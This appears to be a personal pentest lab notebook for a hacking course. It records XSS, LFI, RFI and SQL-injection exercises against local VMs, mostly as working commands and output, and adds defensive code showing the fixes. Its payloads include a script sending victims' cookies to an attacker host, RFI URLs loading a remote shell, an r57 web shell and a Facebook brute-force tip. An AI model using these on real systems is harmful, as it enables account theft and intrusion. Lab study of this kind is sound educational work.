Notebook: nbctcp's notebook
Created: 12-Jan-17 10:20 PM Updated: 29-Jan-17 5:26 AM
Author: Nbctcp Bo
Tags: Hack
URL: http://xcode.or.id/professional/
-to brute-force Facebook using a dictionary, the FireForce plugin is needed in Firefox
CMD> tasklist
CMD> taskkill
QUESTIONS:
-virtualbox remote display multiple connection
-adding new metasploit module
# pico 33538
delete this part
NOTE:
-Kali Linux 2u2 cannot run in VirtualBox because it will error
-Vista and 2008 must be in VMware when attacked with MS09-050; in VirtualBox they blue screen (tested wrong)
-in Metasploit, the difference between shell and meterpreter is that shell gives only DOS commands, while meterpreter can upload, download, run the webcam, etc.
-create fuzzer.py
#!/usr/bin/python3
# Simple FTP fuzzer: send an oversized USER value and watch whether the server survives.
import socket
ipaddress = "192.168.1.106"        # target FTP server
paket = 200                        # length of the USER field
commanduserftp = "\x41" * paket    # 200 'A' bytes
commandpassftp = "anonymous"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ipaddress, 21))
print(s.recv(1024))                # banner
s.send(("USER " + commanduserftp + "\r\n").encode())
print(s.recv(1024))
s.send(("PASS " + commandpassftp + "\r\n").encode())
s.close()
...
...
# locate pattern_create.rb
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb
# /usr/share/metasploit-framework/tools/exploit/pattern_create.rb 1000
or in Kali2 use
# /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 1000
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae
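Added example (not from the notes or from Metasploit): a Python re-implementation of the cyclic pattern that pattern_create.rb prints and of the reverse lookup pattern_offset.rb does, used when triaging a crash to find which byte of a long input landed in a register.

```python
# Added example, not code from the notebook: re-implements the Aa0Aa1... pattern
# of pattern_create.rb and the lookup done by pattern_offset.rb.
import string
import struct


def pattern_create(length):
    """Return the first `length` characters of the Aa0Aa1Aa2... cyclic pattern.

    Three nested character sets (upper, lower, digit) give 26*26*10 = 6760
    units of 3 chars, so the sequence only repeats after 20280 bytes and any
    4-byte window inside that range is unique.
    """
    out = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out.append(upper + lower + digit)
                if len(out) * 3 >= length:
                    return "".join(out)[:length]
    return "".join(out)[:length]


def pattern_offset(value, length=20280):
    """Locate a crash value inside the pattern; -1 if it is not there.

    `value` is either the 4-char string read from a debugger dump or the int a
    32-bit register held; an int is unpacked little-endian, so 0x41336241
    becomes "Ab3A" (the bytes as they sat in memory).
    """
    if isinstance(value, int):
        needle = struct.pack("<I", value).decode("ascii", errors="replace")
    else:
        needle = value
    return pattern_create(length).find(needle)


if __name__ == "__main__":
    print(pattern_create(1000))           # same output as pattern_create.rb -l 1000
    print(pattern_offset(0x41336241))     # 39
```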
25/1
NOTE:
turn off DeepFreeze in XP vm by typing Ctrl+Alt+Shift+F6, then click Boot Thawed. Password pentium2
p500 DOS
STATUS:
VM:
p541 SSLStrip
STATUS:
VM: KALI
p586 HeartBleed
STATUS: OK -> needs a lot of login activity so that we can capture the password
VM: KALI UBUNTU13.04.vdi
p593 Cookie
STATUS: OK
VM: WIN7 XPSP2 XP
WIN7=hacker, XPSP2=web server, XP=target
-in XPSP2, WordPress starts automatically; you can verify it by browsing to http://localhost/blog/wordpress/
-in WIN7 make sure you have Firefox ESR with the GreaseMonkey plugin
after enabling the GreaseMonkey plugin, install http://userscripts-mirror.org/scripts/show/119798
install Cain&Abel
install Wireshark and set the NIC's Promiscuous Mode to Allow All in VirtualBox
-to change WordPress ip in XPSP2
go to http://localhost/phpmyadmin
L: root
P:
click WordPress on the left bar
click wp_options
click Browse
click Edit on siteurl
change ip there
click on Save\Go
-server WordPress running in XPSP2
-hacker WIN7
run cainabel
click Sniffer
click Host at the bottom
right click/Scan MAC Addresses
click bottom APR
click activate top APR
click top right box
click top +
on the left click the user ip, e.g. 192.168.1.109
on the right click the WordPress server ip, e.g. 192.168.1.111
p604-611
STATUS:
VM: KALI XPSP3
Client side attack
p725 Hercules (remote exploit to bypass WIN10 MS Defender. Can be detected by TrendMicro)
STATUS:
VM: KALI WIN10
# cd /opt
# git clone https://github.com/EgeBalci/HERCULES
-in mIRC, to check who in channel #yogyakarta has an IP starting with 180
/who #yogyakarta *!*@125.*
now
p506 Yersinia
STATUS:
VM: KALI WIN7
p788 DIRBUSTER
Wordlist.txt here means DirBuster tries each filename listed inside wordlist.txt
p824 XSS
STATUS: OK
VM: WINXPSP2
-in WINXPSP2
-the web server in WINXPSP2 starts automatically at boot
open web browser
go to http://192.168.1.32/blogphp
test xss injection
http://192.168.1.32/blogphp/index.php?search=%22%3E%3C/title%3E%3Cmarquee%20bgcolor=%22red%22%3E%3CH2%3EKurniawan%20ganteng%3C/H2%3E%3C/marquee%3E
result
http://192.168.1.32/blogphp/index.php?search=%22%3E%3C/TITLE%3E%3CIFRAME%20src=http://xcode.or.id%3E%3CIFRAME%3E
result
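Added example (not from the notes or from blogphp): the search payload above works because the `search` value is copied into the page's `<title>` without encoding, so `%22%3E%3C/title%3E` closes the title and everything after it is parsed as markup. The template below is a constructed stand-in for the real page; it shows the vulnerable rendering next to the fixed one, which HTML-escapes the term.

```python
# Added example, not code from the notebook or from blogphp.
import html
from urllib.parse import parse_qs, urlsplit

# The reflected-XSS URL from the notes above.
PAYLOAD_URL = (
    "http://192.168.1.32/blogphp/index.php?search=%22%3E%3C/title%3E"
    "%3Cmarquee%20bgcolor=%22red%22%3E%3CH2%3EKurniawan%20ganteng%3C/H2%3E"
    "%3C/marquee%3E"
)

# Constructed stand-in for the part of index.php that echoes the search term.
TEMPLATE = '<title>Search: "%s"</title><body>results...</body>'


def search_term(url):
    """Decode the `search` query parameter the way the web server would."""
    return parse_qs(urlsplit(url).query).get("search", [""])[0]


def render_vulnerable(term):
    """Raw interpolation: the attacker's quote and tags become real markup."""
    return TEMPLATE % term


def render_safe(term):
    """Escape <, >, &, \" and ' so the term can only ever be rendered as text."""
    return TEMPLATE % html.escape(term, quote=True)


def contains_injected_tag(page):
    """Detects the breakout: a second </title> or a <marquee> the template never emits."""
    return page.count("</title>") > 1 or "<marquee" in page.lower()


if __name__ == "__main__":
    term = search_term(PAYLOAD_URL)
    print(contains_injected_tag(render_vulnerable(term)))  # True
    print(contains_injected_tag(render_safe(term)))        # False
```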
p825 Wapiti
STATUS:
VM: KALI XPSP2
-in KALI
# wapiti http://192.168.1.111/wcms
To test whether this message box is XSS-vulnerable, we need to test it with a script
click Settings
click Profile
back to Settings to apply real script
paste below script
<script>document.write('<img src="http://192.168.1.105/scriptcokie.php?cookie=' + document.cookie + '" />')</script>
click Update
click Profile
-in KALI
open FireFox and install Tamper Data plugin
open
p853 LFI
STATUS:
VM: XPSP2
-in XPSP2
open firefox
go to http://localhost/blog/wordpress/wp-content/plugins/wp-custom-pages/wp-download.php?url=..%2f..%2f..%2fwp-config.php
p857 RFI
STATUS:
VM: KALI XPSP2
-in XPSP2
check that WordPress is running by going to http://192.168.1.111/blog/wordpress/
-in KALI
copy shell.txt into /var/www/html
# wpscan http://192.168.1.111/blog/wordpress/
open firefox and go to
http://192.168.1.111/blog/wordpress/wp-content/plugins/annonces/includes/lib/photo/uploadPhoto.php?abspath=http://192.168.1.108/shell.txt?
# wapiti http://192.168.1.32/sinaraccounting
Remote inclusion vulnerability in http://192.168.1.32/sinaraccounting/index.php via injection in the parameter accounting
Evil url: http://192.168.1.32/sinaraccounting/index.php?accounting=http%3A%2F%2Fwww.google.fr%2F%3F
open browser go to
http://192.168.1.32/sinaraccounting/index.php?accounting=http://192.168.1.108/shell.txt?
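Added example (not from the notes, WordPress or either plugin): the LFI (`wp-download.php?url=..%2f..%2f..%2fwp-config.php`) and the RFI (`uploadPhoto.php?abspath=http://.../shell.txt?`, and the `accounting` parameter above) both come from a script handing a user-supplied path straight to include/readfile. The resolver below is a constructed stand-in for such a handler: it refuses URL schemes and absolute paths, then resolves the path and keeps only what stays under the intended directory. `BASE_DIR` is a made-up location.

```python
# Added example, not code from the notebook or from any of the plugins named.
import os
from urllib.parse import unquote, urlsplit

# Constructed directory the download handler is meant to serve files from.
BASE_DIR = "/srv/www/blog/wordpress/wp-content/plugins/wp-custom-pages/files"


def resolve_download(base_dir, user_value):
    """Return the absolute path to serve, or None when the request is unsafe.

    Rejects remote includes (any URL scheme: http://, ftp://, php://, data:),
    absolute paths, and '..' traversal whether plain or percent-encoded, by
    resolving the path and checking it is still contained in base_dir.
    """
    decoded = unquote(user_value)                 # ..%2f..%2f -> ../../
    if not decoded or urlsplit(decoded).scheme:   # RFI: anything with a scheme
        return None
    if os.path.isabs(decoded) or decoded.startswith(("/", "\\")):
        return None
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, decoded))
    if os.path.commonpath([base, target]) != base:  # LFI: escaped base_dir
        return None
    return target


if __name__ == "__main__":
    for value in ("report.pdf",
                  "..%2f..%2f..%2fwp-config.php",
                  "http://192.168.1.108/shell.txt?",
                  "/etc/passwd"):
        print(value, "->", resolve_download(BASE_DIR, value))
```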
LAB Extra
STATUS: OK
VM: KALI WINXPSP2
-in KALI
# wapiti http://192.168.1.32/data
Referer: http://192.168.1.32/data/view.php?postid=1
Content-Type: application/x-www-form-urlencoded
nama=default&email=default&website=default&komentar=%3Cscript%3Ealert%28%27wapkdv40pk%27%29%3C%2Fscript%3E&id=1&kirim=Kirim%21
[+] Launching module blindsql
Blind SQL vulnerability in http://192.168.1.32/data/login.php via injection in the query string
Evil url: http://192.168.1.32/data/login.php?%22%20or%20sleep%287%29%3D%22
Blind SQL vulnerability in http://192.168.1.32/data/insert.mhs.php via injection in the query string
Evil url: http://192.168.1.32/data/insert.mhs.php?sleep%287%29%231
-in WINXPSP2
run Havij
click Tables
click Get Tables
check tbl_user
click Get Column
open browser
go to http://localhost/data/user.php
L: admin
P: 12345
p894 SQLMAP
STATUS:
VM: KALI WINXPSP2
# sqlmap -u http://192.168.1.111/data/view.php?postid=1 -D admin_mhs --tables
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] y
[07:39:45] [INFO] GET parameter 'postid' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'postid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
web server operating system: Windows
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: MySQL 5.0.12
[07:40:34] [INFO] fetching tables for database: 'admin_mhs'
Database: admin_mhs
[7 tables]
+---------------------+
| tbl_artikel |
| tbl_cln_mahasiswa |
| tbl_komentar |
| tbl_mhsiswa |
| tbl_nilai_mahasiswa |
| tbl_user |
| tbl_user_profile |
+---------------------+
[07:40:34] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.1.111'
-in WINXPSP2
copy r57.php into E:\xampp\htdocs
install wapiti for windows
> wapiti http://192.168.1.108/sinaraccounting
[+] Launching module file
Remote inclusion vulnerability in http://192.168.1.111/sinaraccounting/index.php via injection in the parameter accounting
Evil url: http://192.168.1.111/sinaraccounting/index.php?accounting=http%3A%2F%2Fwww.google.fr%2F%3F
p956 Antiloris
STATUS:
VM: UBUNTU13.04
p962 ARPON
STATUS:
VM:
-update repository
# apt-get clean && apt-get update && apt-get upgrade -y